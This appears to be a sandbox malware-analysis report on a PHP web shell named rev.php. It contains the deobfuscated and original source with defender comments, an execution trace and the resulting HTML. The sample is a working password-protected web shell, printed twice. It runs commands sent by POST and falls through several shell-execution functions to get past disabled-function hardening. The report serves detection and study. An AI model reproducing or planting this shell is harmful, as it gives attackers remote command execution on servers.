PHP Malware Analysis

rev.php

md5: dafd9037e6ffbba7f81cdb4b5aa6914e


Deobfuscated PHP code

<?php

// Analyst notes: entry gate of the shell. All three POST fields ('cmd',
// 'd', 'secret') must be present and md5($_POST['secret']) must equal the
// hardcoded digest; otherwise the script prints "./" and exits. That bare
// "./" body is exactly what the generated-HTML section of this page shows
// for a request without parameters, so it is a usable response-side
// indicator for this sample. The digest is checked with loose '!=' rather
// than hash_equals().
error_reporting(E_ALL);
ini_set("display_errors", 1);
if (!isset($_POST['cmd']) || !isset($_POST['d']) || !isset($_POST['secret']) || md5($_POST['secret']) != "4866dd3a84a8a5a8ff09881338e24dce") {
    echo "./";
    exit;
}
$cmd = $_POST['cmd']; // operator-supplied command line, dispatched further down
$cwd = $_POST['d'];   // operator-supplied working directory
// isset() is always true here: $cwd was just assigned from a field the guard
// above confirmed is set. The dispatch code below calls chdir() again, so
// this first call is effectively redundant.
if (isset($cwd)) {
    chdir($cwd);
}
/**
 * Runs $in through the first shell-execution primitive that is still
 * available and returns its captured output. Probe order: exec, passthru,
 * system, shell_exec, then popen. Every call is '@'-suppressed, so a
 * disabled or failing primitive leaves no warning in the response.
 *
 * Defender notes: function_exists() returns false for names listed in
 * disable_functions, so this chain presumably exists to fall through to
 * whichever primitive a hardening config left enabled — all five need to
 * be disabled together for that control to matter. The two fixed strings
 * returned below are distinctive enough to serve as response-body
 * signatures for this sample.
 *
 * @param string $in command line to execute (the caller prefixes 'echo;')
 * @return string command output, or a fixed message when nothing could run
 *                or nothing was returned
 */
function ex($in)
{
    $▖ = ''; // accumulated output (the variable name appears garbled in this listing)
    if (function_exists('exec')) {
        @exec($in, $▖);           // exec() fills $▖ with one array entry per output line
        $▖ = @join("\n", $▖);     // flatten to a single string
    } elseif (function_exists('passthru')) {
        ob_start();               // passthru()/system() write straight to stdout,
        @passthru($in);           // so the output is captured via an output buffer
        $▖ = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $▖ = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $▖ = shell_exec($in);     // returns the output directly
    } elseif (is_resource($f = @popen($in, "r"))) {
        $▖ = "";
        while (!@feof($f)) {
            $▖ .= fread($f, 1024); // drain the pipe to EOF in 1 KiB chunks
        }
        pclose($f);
    } else {
        return "\nSorry,unable to execute command\n";
    }
    //	exit();
    return $▖ == '' ? "\nQuery did not return anything\n" : $▖;
}
// Dispatch on the command text, three branches:
//  1. a bare "cd"          -> print the current directory only;
//  2. "cd <path>[ 2>&1]"   -> change directory in-process (no shell involved),
//                             then print the new cwd;
//  3. anything else        -> chdir($cwd), print the cwd, then run the
//                             command through ex() with 'echo;' prepended.
// The cwd echoed before every result, and the "sh: cd: ...: No such file or
// directory" text that imitates a real shell's error, are stable strings an
// analyst can key on in response bodies.
if (preg_match("/^\\s*cd\\s*\$/", $cmd)) {
    echo getcwd();
} elseif (preg_match("/^\\s*cd\\s+(.+)\\s*(2>&1)?\$/", $cmd)) {
    // $cwd was already passed to chdir() near the top of the file; this
    // repeats it with an explicit existence check and shell-style error text.
    if (is_dir($cwd)) {
        chdir($cwd);
    } else {
        echo "sh: cd: " . $cwd . ": No such file or directory\n";
    }
    // Second, stricter match: the target must be a single non-whitespace
    // token. A target containing whitespace satisfied the first pattern but
    // can fail this one, leaving $match[1] undefined (display_errors is on).
    preg_match("/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?\$/", $cmd, $match);
    if (is_dir($match[1])) {
        chdir($match[1]);
    } else {
        echo "sh: cd: " . $match[1] . ": No such file or directory\n";
    }
    echo getcwd();
} else {
    chdir($cwd);
    echo getcwd();
    echo ex('echo;' . $cmd);
    //header('dir: ' .getcwd());
}

Execution traces

data/traces/dafd9037e6ffbba7f81cdb4b5aa6914e_trace-1676244199.5981.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:45.495933]
1	0	1	0.000252	393512
1	3	0	0.000380	414272	{main}	1		/var/www/html/uploads/rev.php	0	0
2	4	0	0.000397	414272	error_reporting	0		/var/www/html/uploads/rev.php	2	1	32767
2	4	1	0.000412	414344
2	4	R			22527
2	5	0	0.000425	414304	ini_set	0		/var/www/html/uploads/rev.php	3	2	'display_errors'	1
2	5	1	0.000440	414376
2	5	R			''
			0.000474	335128
TRACE END   [2023-02-12 21:23:45.496292]


Generated HTML code

<html><head></head><body>./</body></html>

Original PHP code

<?php
// Analyst notes: entry gate of the shell. All three POST fields ('cmd',
// 'd', 'secret') must be present and md5($_POST['secret']) must equal the
// hardcoded digest; otherwise the script prints "./" and exits. That bare
// "./" body is exactly what the generated-HTML section of this page shows
// for a request without parameters, so it is a usable response-side
// indicator for this sample. The digest is checked with loose '!=' rather
// than hash_equals().
error_reporting(E_ALL);
ini_set("display_errors", 1);
if(!isset($_POST['cmd']) || !isset($_POST['d']) || !isset($_POST['secret']) || md5($_POST['secret']) != "4866dd3a84a8a5a8ff09881338e24dce"){
  echo "./";
  exit();
}
$cmd = $_POST['cmd']; // operator-supplied command line, dispatched further down
$cwd = $_POST['d']; // operator-supplied working directory
// isset() is always true here: $cwd was just assigned from a field the guard
// above confirmed is set. The dispatch code below calls chdir() again, so
// this first call is effectively redundant.
if(isset($cwd)){
  chdir($cwd);
}
/**
 * Runs $in through the first shell-execution primitive that is still
 * available and returns its captured output. Probe order: exec, passthru,
 * system, shell_exec, then popen. Every call is '@'-suppressed, so a
 * disabled or failing primitive leaves no warning in the response.
 *
 * Defender notes: function_exists() returns false for names listed in
 * disable_functions, so this chain presumably exists to fall through to
 * whichever primitive a hardening config left enabled — all five need to
 * be disabled together for that control to matter. The two fixed strings
 * returned below are distinctive enough to serve as response-body
 * signatures for this sample.
 *
 * @param string $in command line to execute (the caller prefixes 'echo;')
 * @return string command output, or a fixed message when nothing could run
 *                or nothing was returned
 */
function ex($in) {
	$▖ = ''; // accumulated output (the variable name appears garbled in this listing)
	if (function_exists('exec')) {
		@exec($in,$▖); // exec() fills $▖ with one array entry per output line
		$▖ = @join("\n",$▖); // flatten to a single string
	} elseif (function_exists('passthru')) {
		ob_start(); // passthru()/system() write straight to stdout,
		@passthru($in); // so the output is captured via an output buffer
		$▖ = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($in);
		$▖ = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$▖ = shell_exec($in); // returns the output directly
	} elseif (is_resource($f = @popen($in,"r"))) {
		$▖ = "";
		while(!@feof($f))
			$▖ .= fread($f,1024); // drain the pipe to EOF in 1 KiB chunks
		pclose($f);
	}else return "\nSorry,unable to execute command\n";
//	exit();
	return ($▖==''?"\nQuery did not return anything\n":$▖);
//	exit();
}
    // Dispatch on the command text, three branches:
    //  1. a bare "cd"          -> print the current directory only;
    //  2. "cd <path>[ 2>&1]"   -> change directory in-process (no shell involved),
    //                             then print the new cwd;
    //  3. anything else        -> chdir($cwd), print the cwd, then run the
    //                             command through ex() with 'echo;' prepended.
    // The cwd echoed before every result, and the "sh: cd: ...: No such file or
    // directory" text that imitates a real shell's error, are stable strings an
    // analyst can key on in response bodies.
    if (preg_match("/^\s*cd\s*$/", $cmd)) {
       echo getcwd();
    } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
        // $cwd was already passed to chdir() near the top of the file; this
        // repeats it with an explicit existence check and shell-style error text.
        if(is_dir($cwd)){
chdir($cwd);
        }else{
          echo "sh: cd: " .$cwd. ": No such file or directory\n";
        }
        // Second, stricter match: the target must be a single non-whitespace
        // token. A target containing whitespace satisfied the first pattern but
        // can fail this one, leaving $match[1] undefined (display_errors is on).
        preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
        if(is_dir($match[1])){
chdir($match[1]);
        }else{
          echo "sh: cd: " .$match[1]. ": No such file or directory\n";
        }
echo getcwd();
    } else {
        chdir($cwd);
        echo getcwd();
        echo ex('echo;' .$cmd);
//header('dir: ' .getcwd());
    }